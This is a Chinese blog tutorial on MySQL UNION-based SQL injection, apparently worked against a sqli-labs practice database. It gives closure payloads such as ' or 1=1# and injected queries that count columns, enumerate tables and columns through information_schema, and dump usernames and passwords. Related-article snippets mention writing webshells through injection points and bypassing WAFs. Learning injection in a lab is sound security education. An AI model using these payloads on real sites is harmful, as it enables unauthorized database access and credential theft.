mysql联合注入

最新推荐文章于 2024-07-11 00:29:01 发布
最新推荐文章于 2024-07-11 00:29:01 发布
阅读量243 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42409373/article/details/117781063
版权
本文探讨了MySQL的UNION操作符,用于合并查询结果。重点讲解了联合注入的概念,详细阐述了注入流程,并列出了一些常见的系统函数和字符串连接函数在注入中的作用,同时讨论了SQL语句的不同闭合方式,通过实例加深理解。
摘要由CSDN通过智能技术生成

union操作符
用于合并两个或多个查询语句的结果。

union内部的select语句必须拥有相同的数量的列,列也必须拥有相似的数据类型,同时,每条select语句中的列的顺序必须完全相同

union语法

union
select column(s) from table union select column(s) from table

union all
select column(s) from table union select column(s) from table

注:如果前后两条select语句查询结果相同使用union只输出一条结果

联合注入应用场景

1.只要union连接的几个查询的字段数一样且列的数据类型转换没问题,就可以查询出结果。
2.注入页面有回显。

注入流程

1.order by 确定列数
2.观察页面返回,选取可以显示数据的地方
3.读数据库
4.读表名
5.读字段名
6.读数据

常见系统函数

1.version()——MySQL版本
2.user()——数据库用户名
3.database()——数据库名
4.@@datadir——数据库路径
5.@@version_compile_os——操作系统版本

字符串连接函数

1.concat(str1,str2,...)——没有分隔符地连接字符串
2.concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
3.group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据

sql语句常见闭合方式

 or 1=1#
'or 1=1#
"or 1=1#
)or 1=1#
')or 1=1#
") or 1=1#

实例

单引号判断,导致页面报错,得到报错信息:'1'' LIMIT 0,1
由此可以假设出原sql语句为:
select * from users where id = '1'

在这里插入图片描述

使用order by判断字段数为3
' order by 3 %23
%23是#的url编码,表示注释掉后面多余的sql语句

在这里插入图片描述

在这里插入图片描述

使用联合查询判断回显位为2和3
' union select 1,2,3 %23

在这里插入图片描述

查看数据库
' union select 1,2,database() %23

在这里插入图片描述

查看security里的表
' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' %23

在这里插入图片描述

查看users表里的字段
' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

在这里插入图片描述

查看users表里的数据
' union select 1,2,group_concat(id,':',username,':',password) from users %23

在这里插入图片描述

xyp1x
关注
专栏目录
Mysql注入之一 联合注入
笨蛋9的博客
02-17 3205
一 前言作者也在学习web安全,可能文章中或多或少存在一些错误内容。写些手工注入的文章,一方面能加深对这部分知识的印象,一方面也能大家互相学习。 有人可能问:数据库注入不是有很多非常强大的工具,如sqlmap,为什么还要去花些时间去学习手工注入。虽然使用sqlmap等注入工具能很轻松的对拖一个存在注入漏洞无安全狗的网站的数据库,但却无法知道注入的全过程,不方便后续写一些自动化测试的脚本,同时由于是
MYSQL联合注入
qq_39654116的博客
01-04 265
目录简介特定变量查询步骤Mysql版本<5.0Mysql版本>=5.0注入语句 简介 联合注入是使用了union select联合查询,通常用来拼接在where后面,联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截 特定变量 1\. SCHEMATA表 : 提供了当前mysql实例中所有数据库的信息。 2\. TABLES 表 : 提供了关于数据库中的表的信息。 3\. C
sql注入联合详解
最新发布
2301_80679350的博客
07-11 1339
SQL 注入是一种常见的网络安全攻击方式,黑客利用它来篡改应用程序后台数据库的 SQL 查询,以实现非法目的。攻击者通过向应用程序的输入字段中插入恶意 SQL 代码,来执行未经授权的数据库操作。
mysql联合注入_SQL 注入:联合注入
weixin_30585729的博客
01-20 174
SQL注入一直都是web安全的主要漏洞之一,数年来仍旧是最常见的漏洞,其主要是因为前后端进行数据交互时注入恶意的SQL语句,导致最终执行的语句拼接。往往是因为开发人员防护不严,导致未过滤敏感字符。联合注入联合注入是比较常见的一种,可以说是开发人员没有进行任何过滤。这里用PHP来进行简单的数据交互源代码:$id=$_GET['id'];$conn=mysqli_connect("localhost"...
MySQL之union联合注入
2301_79299101的博客
09-18 162
我们通过-1' union select 1,(select XXX_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)#当输入的参 x 为整型,Sql 语句类型大致如下:select * from <表名> where id = 'x'这样就要用X'and'1'='1和X'and'1'='2来判断了。1,判断是否存在sql注入:通常是id=XXX’输入,看页面是否会报错,如果有报错,则存在sql漏洞。
mysql 联合查询注入
broing55的博客
01-07 532
一. dvwa sql注入 low mid high Low 1.输入1提交 2.输入1’提交 3.输入1 and 1=1 提交 4. 输入1 and 1=2 提交 源码: 列数:2 爆个数据库: 数据库里的表: 表里的表头: 查user和password: 二.medium级别 使用抓包软件bp抓包 当id=1’ ...
MySQl联合注入实战
weixin_45118086的博客
03-19 346
MySQl联合注入 一个真.入门级的MySQl联合注入 靶场地址:靶场 目标:拿到管理员账号密码 1、寻找注入点 点击查看新闻,注意URL的变化 可以发现有了一个查询值id=1.于是,开始我们的第一步,探测注入点。 把?之后的数据改为: id = 1 and 1=2 刷新页面之后长这个样子: 2、判断字段数,以用来进行联合注入 借助order by来进行探测,经过探测,可以得知查询的字段数为2 因此,union查询的字段数也应该为2 3、判断回显点 使用这个语句来判断回显点 union select
MySQL联合注入基于安全狗的WAF绕过详情
m0_50211409的博客
04-08 551
WAF是指Web应用防护系统(网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。F5是提供WAF产品和服务的国际厂商,F5 WAF 新品ASM. APM, Edge Gateway全新亮相。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 测试环境:东塔学院SQL注入绕过安全狗 https://labs.do-ta.com/index/course/detail/id/29 测试工
第01篇:MySQL注入点写WebShell的5种方式1
08-03
这是最常见且最直观的方法,适用于联合注入。攻击者通过`UNION SELECT`结合`INTO OUTFILE`将PHP代码(通常是一句话木马)写入指定的Web目录。为了成功执行此操作,需要满足以下条件: - `secure_file_priv`配置项...
计算机病毒与防护:MYSQL联合查询上.ppt
06-10
MySQL联合查询与防护】 MySQL数据库中的联合查询(UNION)是一种强大的操作,它允许将两个或更多SELECT语句的结果合并成一个结果集。在理解联合查询时,我们需要明确几个关键概念: 1. **UNION操作符**:UNION...
MySQL联合注入
yuan_boss的博客
08-23 255
通过information_schema库的COLUMNS,查询表字段table_name,值为cms_users的字段信息,并且使用GROUP_CONCAT()函数将所有的字段名打印出来,然后转换为hex,将结果进行解码即可获得字段名。利用order by的特性----他可以指定列的顺序来进行排序,所以可以在order by后面直接加数字,表示按照第几列排序,一旦数字超过了列数,就会报错,从而可以推算出字段数。字符型注入中,哪个符号引发的报错,就代表是哪个符号的字符型注入。比如,这里获得的数据库表名是。
mysql注入 —— union
SPS98
05-07 663
union可以用于合并两个或多个select语句的结果集 场景: PHP中使用的查询代码大致如下(可能有语法错误) $id = $_GET['id']; $sql = "select * from users where id = '$id' limit 0, 1"; $result = mysqld_query($sql); $row = mysqld_fetch_array($result)...
sql注入基础-mysql联合注入
Redredredfish的博客
12-07 578
原理 sql注入攻击的本质就是把用户输入的参数当做SQL语句来执行,Web应用程序对用户输入数据的合法性没有进行判断和过滤,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 造成sql注入需要满足两个条件: 1.用户输入可控 2.输入参数被拼接成sql语句执行 危害 敏感信息泄露,获取数据权限,上传webshell,执行命令,篡改网页信息等 常见注入点 GET/POST/PUT/DELETE参数 http头注入(X-Forwarded-For) 文件名 cookie注入 判断注入
mysql union联合注入
Sys1em32 安全之路
12-05 285
记录一下联合查询常用的手工注入语句,这里以dvwa为例,联合查询页面必须要有回显 0x01.判断是否存在注入点: 一般添加单引号查看是否报错,或者and 1=1查看页面是否正常显示,and 1=2查看是否报错,判断存在注入。 0x02.判断字段数 注入语句:http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=1'+orde...
SQL注入之union 联合注入
weixin_53711701的博客
01-16 4702
SQL注入之union联合注入
PHP+MYSQL注入详解:试探、环境探测与联合查询
- **构造注入语句分析源码**:源码展示了如何使用`mysql_connect`和`mysql_db_query`执行SQL查询,但未过滤用户输入`$id`,这就提供了潜在的注入入口。 - **执行SQL并检查结果**:如果`$id`未被过滤,恶意输入可能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值